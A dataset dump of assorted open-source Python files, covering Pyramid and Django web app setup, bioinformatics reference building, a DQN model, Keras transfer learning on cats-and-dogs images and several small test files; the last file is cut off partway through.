max_stars_repo_path stringlengths 3 269 | max_stars_repo_name stringlengths 4 119 | max_stars_count int64 0 191k | id stringlengths 1 7 | content stringlengths 6 1.05M | score float64 0.23 5.13 | int_score int64 0 5 |
|---|---|---|---|---|---|---|
offlinetools/__init__.py | OpenCIOC/offlinetools | 1 | 12761551 | # =========================================================================================
# Copyright 2016 Community Information Online Consortium (CIOC) and KCL Software Solutions Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================================
from __future__ import absolute_import
import os
from pyramid.config import Configurator
from sqlalchemy import create_engine
from sqlalchemy.exc import OperationalError
from pyramid_beaker import session_factory_from_settings
from pyramid.authentication import SessionAuthenticationPolicy
from pyramid.authorization import ACLAuthorizationPolicy
from pyramid.security import NO_PERMISSION_REQUIRED, Authenticated, Deny, Allow, Everyone
from apscheduler.schedulers.background import BackgroundScheduler
from offlinetools.models import initialize_sql, get_config
from offlinetools.request import passvars_pregen
from offlinetools.scheduler import scheduled_pull, key_to_schedule
from offlinetools.logtools import _get_app_data_dir
import logging
log = logging.getLogger('offlinetools')
def groupfinder(userid, request):
user = request.user
if user is not None:
log.debug('user: %s, %d', user.UserName, user.ViewType)
return ['group:' + str(user.ViewType)]
return None
class RootFactory(object):
__acl__ = [(Allow, Authenticated, 'view'), (Deny, Everyone, 'view')]
def __init__(self, request):
try:
if not request.config.machine_name:
self.__acl__ = [(Allow, Everyone, 'view')]
except OperationalError:
log.critical('request.url: %s', request.path_qs)
pass
def found_view(request):
return request.context
sched = None
def main(global_config, **settings):
""" This function returns a Pyramid WSGI application.
"""
global sched
app_data_dir = _get_app_data_dir()
engine = create_engine('sqlite:///%s\\OfflineTools.db' % app_data_dir, isolation_level='READ UNCOMMITTED')
initialize_sql(engine)
cfg = get_config()
sched = BackgroundScheduler()
sched.start()
sched.add_job(scheduled_pull, 'cron', **key_to_schedule(cfg.public_key))
session_lock_dir = os.path.join(app_data_dir, 'session')
try:
os.makedirs(session_lock_dir)
except os.error:
pass
settings['beaker.session.lock_dir'] = session_lock_dir
session_factory = session_factory_from_settings(settings)
authn_policy = SessionAuthenticationPolicy(callback=groupfinder, debug=True)
authz_policy = ACLAuthorizationPolicy()
config = Configurator(settings=settings, session_factory=session_factory,
root_factory=RootFactory,
request_factory='offlinetools.request.OfflineToolsRequest',
authentication_policy=authn_policy,
authorization_policy=authz_policy)
config.include('pyramid_mako')
config.add_translation_dirs('offlinetools:locale')
config.add_static_view('static', 'offlinetools:static', cache_max_age=3600, permission=NO_PERMISSION_REQUIRED)
config.add_route('search', '/', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.search.Search', route_name='search', attr='search',
permission='view', renderer='search.mak')
config.add_route('results', '/results', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.search.Search', route_name='results', attr='results',
permission='view', renderer='results.mak')
config.add_route('record', '/record/{num}', factory='offlinetools.views.record.RecordRootFactory', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.record.Record', route_name='record',
permission='view', renderer='record.mak')
config.add_route('comgen', '/comgen', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.comgen.ComGen', renderer='json', route_name='comgen', permission='view')
config.add_route('keywordgen', '/keywordgen', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.comgen.KeywordGen', renderer='json', route_name='keywordgen')
config.add_route('login', '/login', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.login.Login', renderer='login.mak', route_name='login',
request_method='POST', attr='post', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.login.Login', renderer='login.mak', route_name='login',
attr='get', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.login.Login', renderer='login.mak',
context='pyramid.httpexceptions.HTTPForbidden',
attr='get', permission=NO_PERMISSION_REQUIRED)
config.add_route('logout', '/logout', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.login.logout', route_name='logout', permission=NO_PERMISSION_REQUIRED)
config.add_route('register', '/register', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.register.Register', route_name='register', request_method='POST',
attr='post', renderer='register.mak', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.register.Register', route_name='register',
attr='get', renderer='register.mak', permission=NO_PERMISSION_REQUIRED)
config.add_route('updateconfig', '/config', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.register.UpdateUrl', route_name='updateconfig', request_method='POST',
attr='post', renderer='updateurl.mak', permission=NO_PERMISSION_REQUIRED)
config.add_view('offlinetools.views.register.UpdateUrl', route_name='updateconfig',
attr='get', renderer='updateurl.mak', permission=NO_PERMISSION_REQUIRED)
config.add_route('pull', '/pull', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.pull.Pull', route_name='pull', renderer='pull.mak')
config.add_route('pull_status', '/pullstatus', pregenerator=passvars_pregen, factory='pyramid.traversal.DefaultRootFactory')
config.add_view('offlinetools.views.pull.PullStatus', route_name='pull_status', renderer='json', permission=NO_PERMISSION_REQUIRED)
config.add_route('status', '/status', factory='offlinetools.views.status.StatusRootFactory', pregenerator=passvars_pregen)
config.add_view('offlinetools.views.status.Status', route_name='status',
renderer='status.mak', permission='view')
config.add_subscriber('offlinetools.subscribers.add_renderer_globals',
'pyramid.events.BeforeRender')
config.scan()
return config.make_wsgi_app()
| 1.476563 | 1 |
tests/guinea-pigs/unittest/nested_suits.py | djeebus/teamcity-python | 105 | 12761552 | <reponame>djeebus/teamcity-python
import unittest
from teamcity.unittestpy import TeamcityTestRunner
from teamcity import is_running_under_teamcity
class TestXXX(unittest.TestCase):
def runTest(self):
assert 1 == 1
if __name__ == '__main__':
if is_running_under_teamcity():
runner = TeamcityTestRunner()
else:
runner = unittest.TextTestRunner()
nested_suite = unittest.TestSuite()
nested_suite.addTest(TestXXX())
suite = unittest.TestSuite()
suite.addTest(nested_suite)
runner.run(suite)
| 2.390625 | 2 |
scripts/cropseq_vector_reference.py | lyz9518/TAPseq_workflow | 3 | 12761553 | <reponame>lyz9518/TAPseq_workflow<gh_stars>1-10
#!/usr/bin/env python
# construct fasta sequence files and gtf annotations for vector transcripts that will be added to
# the alignment reference data
import argparse
from Bio import SeqIO
# define functions to generate reference data ------------------------------------------------------
# function to generate alignment reference data from a fasta file containing vector sequences
def cropseq_alignment_reference(input_fasta, output_bn, fasta_ext = ".fasta", prefix = ""):
# output files
fasta_outfile = output_bn + fasta_ext
gtf_outfile = output_bn + ".gtf"
# open output files
output_fasta = open(fasta_outfile, "w")
output_gtf = open(gtf_outfile, "w")
# process each input sequence
for record in SeqIO.parse(input_fasta, "fasta"):
# add prefix to sequence id
record.id = prefix + record.id
# remove name and description to remove them from header in fasta output
record.name = ""
record.description = ""
# create gtf entry
gtf = gtf_entry(record)
# write gtf entry and modified fasta record to respective output files
output_gtf.write("%s\n" % gtf)
SeqIO.write(record, output_fasta, "fasta")
# close open files
output_fasta.close()
output_gtf.close()
# function to create gtf entry from a crop-seq vector fasta record
def gtf_entry(fasta_record):
# get sequence name and length
seq_name = fasta_record.id
seq_len = len(fasta_record.seq)
# create gtf attribute field
attr_names = ["gene_id", "transcript_id", "gene_name", "transcript_name"]
attr = [s + " " + seq_name for s in attr_names]
attr = "; ".join(attr) + ";"
# create gtf entry
gtf_fields = [seq_name, "VECTOR", "exon", "1", str(seq_len), ".", "+", ".", attr]
gtf_line = "\t".join(gtf_fields)
return gtf_line
# create reference files ---------------------------------------------------------------------------
# create crop-seq vector references based on command line arguments if the is called as main
# program
if __name__ == "__main__":
# parse command line arguments
parser = argparse.ArgumentParser(description = ("Create CROP-seq vector "
"alignment references"))
parser.add_argument("-i", "--input_fasta", type = str, required = True,
help = ("Input fasta file containing sequences of CROP-seq vectors."))
parser.add_argument("-o", "--output_bn", type = str, required = True,
help = "Basename for output files.")
parser.add_argument("--fasta_ext", type = str, default = ".fasta",
help = "Filename extension of fasta files "
"(default: .fasta).")
parser.add_argument("--prefix", type = str, default = "",
help = "Optional prefix to be added to sequence name.")
args = parser.parse_args()
# create crop-seq vector reference
cropseq_alignment_reference(input_fasta = args.input_fasta,
output_bn = args.output_bn,
fasta_ext = args.fasta_ext,
prefix = args.prefix)
| 2.875 | 3 |
ex3_len_interval_proposed.py | vonguyenleduy/dnn_representation_selective_inference | 0 | 12761554 | import numpy as np
from tensorflow.keras.models import load_model
import tensorflow as tf
import time
import gen_data
import util
import parametric_si
def run():
d = 8
IMG_WIDTH = d
IMG_HEIGHT = d
IMG_CHANNELS = 1
mu_1 = 0
mu_2 = 2
threshold = 20
# np.random.seed(1)
X_test, Y_test = gen_data.generate(1, IMG_WIDTH, mu_1, mu_2)
model = load_model('./model/test_' + str(d) + '.h5')
output = model.predict(X_test, verbose=1)
output = output.flatten()
binary_vec = []
for each_e in output:
if each_e <= 0.5:
binary_vec.append(0)
else:
binary_vec.append(1)
# print("Observe", binary_vec)
X_vec = (X_test.flatten()).reshape((d * d, 1))
x_obs = X_vec
eta, etaTx = util.construct_test_statistic(x_obs, binary_vec, d * d)
u, v = util.compute_u_v(x_obs, eta, d * d)
list_zk, list_results = parametric_si.run_parametric_si(u, v, model, d, IMG_CHANNELS, threshold)
z_interval = util.construct_z(binary_vec, list_zk, list_results)
length = 0
for interval in z_interval:
length = length + (interval[1] - interval[0])
# print(length)
return length
from mpi4py import MPI
COMM = MPI.COMM_WORLD
start_time = None
if COMM.rank == 0:
start_time = time.time()
max_iteration = 120
no_thread = COMM.size
iter_each_thread = int(max_iteration / no_thread)
else:
iter_each_thread = None
iter_each_thread = COMM.bcast(iter_each_thread, root=0)
local_list_length = []
for i in range(iter_each_thread):
length = run()
if length is not None:
local_list_length.append(length)
total_list_length = COMM.gather(local_list_length, root=0)
if COMM.rank == 0:
total_list_length = [_i for temp in total_list_length for _i in temp]
print(total_list_length)
print("--- %s seconds ---" % (time.time() - start_time)) | 2.15625 | 2 |
test/test_model_case.py | jan-g/psh | 0 | 12761555 | import pytest
from psh.model import Word, Id, CommandSequence, Command, Case, VarRef, ConstantString
from psh.glob import STAR
from psh.local import make_env
w = lambda w: Word([Id(w)])
a = Word([VarRef(Id("a"))])
echo = lambda out: CommandSequence([Command([Word([Id("echo")]), Word([ConstantString(out)])])])
x = w("x")
cmd = lambda *cs: CommandSequence([Command([*cs])])
star = Word([STAR])
@pytest.mark.parametrize(("cmd", "variable", "expected"), (
(CommandSequence([Case(a)]), "", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "y", ""),
(CommandSequence([Case(a).with_case(x, echo("foo"))]), "x", "foo"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "", "bar"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "y", "bar"),
(CommandSequence([Case(a).with_case(x, echo("foo")).with_case(star, echo("bar"))]), "x", "foo"),
), ids=lambda x: x.replace(" ", "_") if isinstance(x, str) else x)
def test_basic(cmd, variable, expected):
env = make_env()
env["a"] = variable
assert cmd.evaluate(env) == expected
| 2.40625 | 2 |
service_stats/stats/disk.py | Justintime50/service | 1 | 12761556 | import psutil
from service_stats.stats.globals import Global
class Disk():
@staticmethod
def serve_data():
"""Serve disk info
"""
# Title
disk_title = '='*15 + ' Disk Information ' + '='*15
partition_title = 'Partitions and Usage:'
# Disk Information
partitions = psutil.disk_partitions()
disk = ''
for partition in partitions:
device = f'=== Device: {partition.device} ==='
mountpoint = f' Mountpoint: {partition.mountpoint}'
filesystem_type = f' File system type: {partition.fstype}'
try:
partition_usage = psutil.disk_usage(partition.mountpoint)
except PermissionError:
# Catch errors when a disk isn't ready
continue
total_size = f' Total Size: {Global.get_size(partition_usage.total)}' # noqa
used = f' Used: {Global.get_size(partition_usage.used)}'
free = f' Free: {Global.get_size(partition_usage.free)}'
percentage = f' Percentage: {partition_usage.percent}%'
# Combine each disk into a variable
disk += device + '\n' + mountpoint + '\n' + filesystem_type + \
'\n' + total_size + '\n' + used + '\n' + free + '\n' + \
percentage + '\n'
# Get IO stats since boot
disk_io = psutil.disk_io_counters()
total_read = f'Total read (since boot): {Global.get_size(disk_io.read_bytes)}' # noqa
total_write = f'Total write (since boot): {Global.get_size(disk_io.write_bytes)}' # noqa
final_message = '\n' + disk_title + '\n' + partition_title + \
'\n' + disk + '\n' + total_read + '\n' + total_write
return final_message
| 2.59375 | 3 |
app/urls.py | sairamBikkina/sdp1 | 5 | 12761557 | <reponame>sairamBikkina/sdp1<gh_stars>1-10
from django.contrib.auth.views import LoginView, LogoutView
from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('register', views.register, name='register'),
path('login', LoginView.as_view(template_name='login.html'), name='login'),
path('logout', views.user_logout, name='logout'),
path('about', views.about, name='about'),
path('contact', views.contact, name='contact'),
path('appointments', views.appointments, name='appointments'),
path('prescription', views.prescription, name='prescription'),
path('dashboard', views.dashboard, name='dashboard'),
path('account', views.account, name='account'),
path('invoice', views.invoice, name='invoice'),
path('profile', views.profile, name='profile'),
path('profile/<int:id>', views.profile, name='profile_update'),
path('delete/<int:id>', views.delete, name='profile_delete'),
path('delete/<int:id>/confirm', views.delete_confirm, name='delete_confirm'),
path('create_prescription', views.create_prescription, name='create_prescription'),
path('create_appointment', views.create_appointment, name='create_appointment'),
path('create', views.create, name='create'),
path('create_invoice', views.create_invoice, name='create_invoice'),
]
| 1.804688 | 2 |
days/day03/part1.py | jaredbancroft/aoc2021 | 0 | 12761558 | from helpers import inputs
from submarine.submarine import Submarine
def solution(day):
report = inputs.read_to_list(f"inputs/{day}.txt")
s = Submarine()
power_consumption = s.diagnostics("power_consumption", report)
return power_consumption
| 2.546875 | 3 |
yourcfp/proposals/admin.py | sujay0399/CFP | 2 | 12761559 | from django.contrib import admin
from .models import Proposal, ProposalStatus, Feedback
# Register your models here.
admin.site.register(Proposal)
admin.site.register(ProposalStatus)
admin.site.register(Feedback)
| 1.296875 | 1 |
3.1 Classes/Object Oriented Software Design/cse3063_python_zpehlivan_cpolat_tykomur/Main.py | tahayusufkomur/School_Projects | 0 | 12761560 | import errno
import glob
from os.path import join
from typing import List
from jpype import JClass, getDefaultJVMPath, shutdownJVM, startJVM, java
import Generator as gnr
from Word import Word
path = '1150haber/*.txt'
files = glob.glob(path)
if __name__ == '__main__':
ZEMBEREK_PATH: str = join("bin/zemberek-full.jar")
startJVM(
getDefaultJVMPath(),
'-ea',
f'-Djava.class.path={ZEMBEREK_PATH}',
convertStrings=False
)
TurkishSentenceExtractor: JClass = JClass(
'zemberek.tokenization.TurkishSentenceExtractor'
)
extractor: TurkishSentenceExtractor = TurkishSentenceExtractor.DEFAULT
TurkishMorphology: JClass = JClass('zemberek.morphology.TurkishMorphology')
morphology: TurkishMorphology = TurkishMorphology.createWithDefaults()
Nouns = []
Adjectives = []
Verbs = []
Conjunctions = []
PostPositives = []
all_words = []
"""""
We reading all files here and distributing them to 5 different lists depends on their pos'es
"""""
for name in files:
try:
with open(name) as f:
sentences = extractor.fromParagraph(f.read())
for i, word in enumerate(sentences):
x = f'{word}'
sentence: str = x
analysis: java.util.ArrayList = (
morphology.analyzeAndDisambiguate(sentence).bestAnalysis()
)
pos: List[str] = []
for i, analysis in enumerate(analysis, start=1):
if f'{analysis.getPos()}' != "Punctuation":
x = f'{analysis}'
p = x.find(':') # cleaning data
x = x[1:p] # cleaning data
all_words.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # all_words
if f'{analysis.getPos()}' == 'Noun':
Nouns.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Nouns
if f'{analysis.getPos()}' == 'Verb':
Verbs.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Verbs
if f'{analysis.getPos()}' == 'Conjunction':
Conjunctions.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Conjunctions
if f'{analysis.getPos()}' == 'PostPositive':
PostPositives.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # PostPositives
if f'{analysis.getPos()}' == 'Adjective':
Adjectives.append(Word(x, gnr.get_weight(x), f'{analysis.getPos()}')) # Adjectives
else:
continue
except IOError as exc:
if exc.errno != errno.EISDIR:
raise
w_sentences = gnr.generate_sentences(300, 1000, Nouns, Verbs, Adjectives, Conjunctions, PostPositives)
for i in w_sentences:
print('weight -> ', i.lentgth_of_sentence(), ' ', end='')
w = i.words
for t in w:
print(t.name, ' ', end='')
print('')
w_words = gnr.generate_random_weighted_words(all_words, 25, 100)
for i in w_words:
print(i.name, ' ', i.weight)
shutdownJVM()
| 2.59375 | 3 |
crud/migrations/0008_auto_20210701_0715.py | TownOneWheel/townonewheel | 0 | 12761561 | # Generated by Django 3.2.4 on 2021-07-01 07:15
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('crud', '0007_auto_20210701_0713'),
]
operations = [
migrations.AlterField(
model_name='cat',
name='color',
field=models.CharField(blank=True, choices=[('WHITE', '하얀색'), ('GRAY', '회색'), ('YELLOW', '노란색'), ('BLACK', '검은색')], max_length=20, null=True),
),
migrations.AlterField(
model_name='cat',
name='gender',
field=models.CharField(blank=True, choices=[('DONT_KNOW', '모름'), ('FEMALE', '암컷'), ('MALE', '수컷')], max_length=20, null=True),
),
migrations.AlterField(
model_name='cat',
name='neutering',
field=models.CharField(blank=True, choices=[('DONT_KNOW', '모름'), ('O', 'O'), ('X', 'X')], max_length=10, null=True),
),
migrations.AlterField(
model_name='cat',
name='upload_user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='upload', to=settings.AUTH_USER_MODEL),
),
]
| 1.671875 | 2 |
strings/stringToInteger.py | kushvr7/High-On-DSA | 76 | 12761562 | class Solution(object):
# Runtime: 23 ms, faster than 68.57% of Python online submissions for String to Integer (atoi).00
# Memory Usage: 13.5 MB, less than 79.83% of Python online submissions for String to Integer (atoi).
def myAtoi(self, s):
"""
:type s: str
:rtype: int
"""
i,n=0,len(s)
sign=1
while i<n and s[i]==" ": i+=1;
if i< n and s[i] in "+-":
sign = -1 if s[i]=="-" else 1
i+=1
res =0
while i<n and s[i] in set ("0123456789"):
res= res*10+int(s[i])
i+=1
if sign==-1:
return max(-res,-2**31)
else :
return min(res, 2**31-1) | 2.984375 | 3 |
rolling_shutter_skew/largestComponent.py | stellarpower/vio_common | 0 | 12761563 |
# Python program to print connected
# components in an undirected graph
# https://www.geeksforgeeks.org/connected-components-in-an-undirected-graph/
class Graph:
# init function to declare class variables
def __init__(self, V):
self.V = V
self.adj = [[] for i in range(V)]
def DFSUtil(self, temp, v, visited):
# Mark the current vertex as visited
visited[v] = True
# Store the vertex to list
temp.append(v)
# Repeat for all vertices adjacent
# to this vertex v
for i in self.adj[v]:
if visited[i] == False:
# Update the list
temp = self.DFSUtil(temp, i, visited)
return temp
# method to add an undirected edge
def addEdge(self, v, w):
self.adj[v].append(w)
self.adj[w].append(v)
# Method to retrieve connected components
# in an undirected graph
def connectedComponents(self):
visited = []
cc = []
for i in range(self.V):
visited.append(False)
for v in range(self.V):
if visited[v] == False:
temp = []
cc.append(self.DFSUtil(temp, v, visited))
return cc
| 4.0625 | 4 |
hw3/DQN_model.py | zeshiYang/homework | 1 | 12761564 | import torch.nn as nn
import numpy as np
import torch
class DQN(nn.Module):
'''
pytorch CNN model for Atari games
'''
def __init__(self,img_shape,num_actions):
super(DQN,self).__init__()
self._conv=nn.Sequential(
nn.Conv2d(4,16,kernel_size=5,stride=2),
nn.BatchNorm2d(16),
nn.Conv2d(16,32,kernel_size=5,stride=2),
nn.BatchNorm2d(32),
nn.Conv2d(32,64,kernel_size=5,stride=2),
nn.BatchNorm2d(64)
)
convw=img_shape[0]
convh=img_shape[1]
for i in range(3):
convw=self._getConvSize(convw,5,2)
convh=self._getConvSize(convh,5,2)
linear_input_size=convh*convw*64
self._linear=nn.Sequential(
nn.Linear(linear_input_size,512),
nn.ReLU(),
nn.Linear(512,num_actions)
)
self.num_actions=num_actions
def _getConvSize(self,size,size_kernal,stride):
'''
get the tensor size after Conv operation
:param size:
:param size_kernal:
:param stride:
:return:
'''
return (size-(size_kernal-1)-1)//stride+1
def forward(self,img_in):
'''
:param x:input image:N*C*W*H
:return:Q-values of actions N*num_actions
'''
x=self._conv(img_in)
x=x.view(x.size(0),-1)
return self._linear(x)
def _selectAction(self,img_in,eps_threshold):
'''
select action according to Q values,
:param img_in:input images
:return:action selected
'''
sample=np.random.random()
if(sample>eps_threshold):
with torch.no_grad():
q_value = self.forward(img_in)
return q_value.max(1)[1].item()
else:
return np.random.randint(0,self.num_actions)
def main():
'''
unitest
:return:
'''
import torch
import numpy as np
dqn=DQN((100,100,3),4)
dqn.eval()
img=torch.Tensor(np.zeros((1,4,100,100)))
q=dqn.forward(img)
print(q)
print(q.max(1))
print(dqn._selectAction(img,0.01))
print("finish test")
if __name__=="__main__":
main()
| 2.890625 | 3 |
main.py | poketorena/deep-learning-with-python-and-keras | 0 | 12761565 | <filename>main.py
import os, shutil
import numpy as np
from keras import layers
from keras import optimizers
from keras import models
from keras.applications import VGG16
from keras.preprocessing.image import ImageDataGenerator
from keras.preprocessing.image import image
import matplotlib.pyplot as plt
# 元のデータセットを展開したディレクトリへのパス
original_dataset_dir = "./dogs-vs-cats/train"
# より小さなデータセットを格納するディレクトリへのパス
base_dir = "./cats-and-dogs-small"
# os.mkdir(base_dir)
# 訓練データセット、検証データセット、テストデータセットを配置するディレクトリ
train_dir = os.path.join(base_dir, "train")
# os.mkdir(train_dir)
validation_dir = os.path.join(base_dir, "validation")
# os.mkdir(validation_dir)
test_dir = os.path.join(base_dir, "test")
# os.mkdir(test_dir)
# 訓練用の猫の画像を配置するディレクトリ
train_cats_dir = os.path.join(train_dir, "cats")
# os.mkdir(train_cats_dir)
# 訓練用の犬の画像を配置するディレクトリ
train_dogs_dir = os.path.join(train_dir, "dogs")
# os.mkdir(train_dogs_dir)
# 検証用の猫の画像を配置するディレクトリ
validation_cats_dir = os.path.join(validation_dir, "cats")
# os.mkdir(validation_cats_dir)
# 検証用の犬の画像を配置するディレクトリ
validation_dogs_dir = os.path.join(validation_dir, "dogs")
# os.mkdir(validation_dogs_dir)
# テスト用の猫の画像を配置するディレクトリ
test_cats_dir = os.path.join(test_dir, "cats")
# os.mkdir(test_cats_dir)
# テスト用の犬の画像を配置するディレクトリ
test_dogs_dir = os.path.join(test_dir, "dogs")
# os.mkdir(test_dogs_dir)
# 最初の1000個の猫画像をtrain_cats_dirにコピー
fnames = [f"cat.{i}.jpg" for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_cats_dir, fname)
# shutil.copyfile(src, dst)
# 次の500個の猫画像をvalidation_cats_dirにコピー
fnames = [f"cat.{i}.jpg" for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_cats_dir, fname)
# shutil.copyfile(src, dst)
# 次の500個の猫画像をtest_cats_dirにコピー
fnames = [f"cat.{i}.jpg" for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_cats_dir, fname)
# shutil.copyfile(src, dst)
# 最初の1000個の犬画像をtrain_dogs_dirにコピー
fnames = [f"dog.{i}.jpg" for i in range(1000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(train_dogs_dir, fname)
# shutil.copyfile(src, dst)
# 次の500個の犬画像をvalidation_dogs_dirにコピー
fnames = [f"dog.{i}.jpg" for i in range(1000, 1500)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(validation_dogs_dir, fname)
# shutil.copyfile(src, dst)
# 次の500個の犬画像をtest_dogs_dirにコピー
fnames = [f"dog.{i}.jpg" for i in range(1500, 2000)]
for fname in fnames:
src = os.path.join(original_dataset_dir, fname)
dst = os.path.join(test_dogs_dir, fname)
# shutil.copyfile(src, dst)
# コピーが成功したかチェックする(健全性チェック)
print("total training cat images:", len(os.listdir(train_cats_dir)))
print("total training dog images:", len(os.listdir(train_dogs_dir)))
print("total validation cat images:", len(os.listdir(validation_cats_dir)))
print("total validation dog images:", len(os.listdir(validation_dogs_dir)))
print("total test cat images:", len(os.listdir(test_cats_dir)))
print("total test dog images:", len(os.listdir(test_dogs_dir)))
conv_base = VGG16(weights="imagenet",
include_top=False,
input_shape=(150, 150, 3))
# モデル
model = models.Sequential()
model.add(conv_base)
model.add(layers.Flatten())
model.add(layers.Dense(256, activation="relu"))
model.add(layers.Dense(1, activation="sigmoid"))
# VGG16モデルの重みを凍結する
print()
print(f"This is he number of trainable weights before freezing the conv base: {len(model.trainable_weights)}")
conv_base.trainable = False
print(f"This is he number of trainable weights after freezing the conv base: {len(model.trainable_weights)}")
train_datagen = ImageDataGenerator(
rescale=1. / 255,
rotation_range=40,
width_shift_range=0.2,
height_shift_range=0.2,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True,
fill_mode="nearest"
)
# 検証データは水増しすべきではないことに注意
test_datagen = ImageDataGenerator(rescale=1. / 255)
train_generator = train_datagen.flow_from_directory(
train_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
validation_generator = test_datagen.flow_from_directory(
validation_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
model.compile(loss="binary_crossentropy",
optimizer=optimizers.RMSprop(lr=2e-5),
metrics=["acc"])
print(model.summary())
history = model.fit_generator(train_generator,
steps_per_epoch=100,
epochs=30,
validation_data=validation_generator,
validation_steps=50,
verbose=1)
# モデルを保存
model.save("cats_and_dogs_small_transfer_learning_fit_dense_overall_optimization.h5")
# 訓練時の損失値を正解率をプロット
acc = history.history["acc"]
val_acc = history.history["val_acc"]
loss = history.history["loss"]
val_loss = history.history["val_loss"]
epochs = range(len(acc))
# 正解率をプロット
plt.plot(epochs, acc, "bo", label="Training acc")
plt.plot(epochs, val_acc, "b", label="Validation acc")
plt.title("Training and validation accuracy")
plt.legend()
plt.figure()
# 損失値をプロット
plt.plot(epochs, loss, "bo", label="Training loss")
plt.plot(epochs, val_loss, "b", label="Validation loss")
plt.title("Training and validation loss")
plt.legend()
plt.show()
# 最初から特定の層までを全て凍結
conv_base.trainable = True
set_trainable = False
for layer in conv_base.layers:
if layer.name == "block5_conv1":
set_trainable = True
if set_trainable:
layer.trainable = True
else:
layer.trainable = False
# モデルのファインチューニング
model.compile(loss="binary_crossentropy",
optimizer=optimizers.RMSprop(lr=1e-5),
metrics=["acc"])
print(model.summary())
history = model.fit_generator(train_generator,
steps_per_epoch=100,
epochs=100,
validation_data=validation_generator,
validation_steps=50)
# モデルを保存
model.save("cats_and_dogs_small_transfer_learning_fit_dense_overall_optimization_and_fine_tuning.h5")
# 訓練時の損失値と正解率をプロット(指数移動平均を使ってグラフを滑らかにする)
acc = history.history["acc"]
val_acc = history.history["val_acc"]
loss = history.history["loss"]
val_loss = history.history["val_loss"]
epochs = range(len(acc))
def smooth_curve(points, factor=0.8):
smoothed_points = []
for point in points:
if smoothed_points:
previous = smoothed_points[-1]
smoothed_points.append(previous * factor + point * (1 - factor))
else:
smoothed_points.append(point)
return smoothed_points
plt.plot(epochs, smooth_curve(acc), "bo", label="Smoothed training acc")
plt.plot(epochs, smooth_curve(val_acc), "b", label="Smoothed validation acc")
plt.title("Training and validation accuracy")
plt.legend()
plt.figure()
plt.plot(epochs, smooth_curve(loss), "bo", label="Smoothed training loss")
plt.plot(epochs, smooth_curve(val_loss), "b", label="Smoothed validation loss")
plt.title("Training and validation loss")
plt.legend()
plt.show()
# テストデータで評価する
test_generator = test_datagen.flow_from_directory(
test_dir,
target_size=(150, 150),
batch_size=20,
class_mode="binary"
)
test_loss, test_acc = model.evaluate_generator(test_generator, steps=50)
print(f"test loss: {test_loss}")
print(f"test acc: {test_acc}")
| 2.609375 | 3 |
curris/test/test_script.py | a1trl9/curris | 0 | 12761566 | from curris.test.base import compare_json
def test_script():
compare_json('curris/test/resource/script.md', 'curris/test/resource/script.json')
| 1.46875 | 1 |
tests/file_io/raw_file_io.py | Defense-Cyber-Crime-Center/dfvfs | 2 | 12761567 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the file-like object implementation using pysmraw."""
import os
import unittest
from dfvfs.path import raw_path_spec
from dfvfs.path import os_path_spec
from tests.file_io import test_lib
class RawFileTest(test_lib.ImageFileTestCase):
"""The unit test for the RAW storage media image file-like object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(RawFileTest, self).setUp()
test_file = os.path.join(u'test_data', u'ímynd.dd')
path_spec = os_path_spec.OSPathSpec(location=test_file)
self._raw_path_spec = raw_path_spec.RawPathSpec(parent=path_spec)
def testOpenCloseInode(self):
"""Test the open and close functionality using an inode."""
self._TestOpenCloseInode(self._raw_path_spec)
def testOpenCloseLocation(self):
"""Test the open and close functionality using a location."""
self._TestOpenCloseLocation(self._raw_path_spec)
def testSeek(self):
"""Test the seek functionality."""
self._TestSeek(self._raw_path_spec)
def testRead(self):
"""Test the read functionality."""
self._TestRead(self._raw_path_spec)
class SplitRawFileTest(test_lib.ImageFileTestCase):
"""The unit test for the split storage media image file-like object."""
def setUp(self):
"""Sets up the needed objects used throughout the test."""
super(SplitRawFileTest, self).setUp()
test_file = os.path.join(u'test_data', u'image.raw.000')
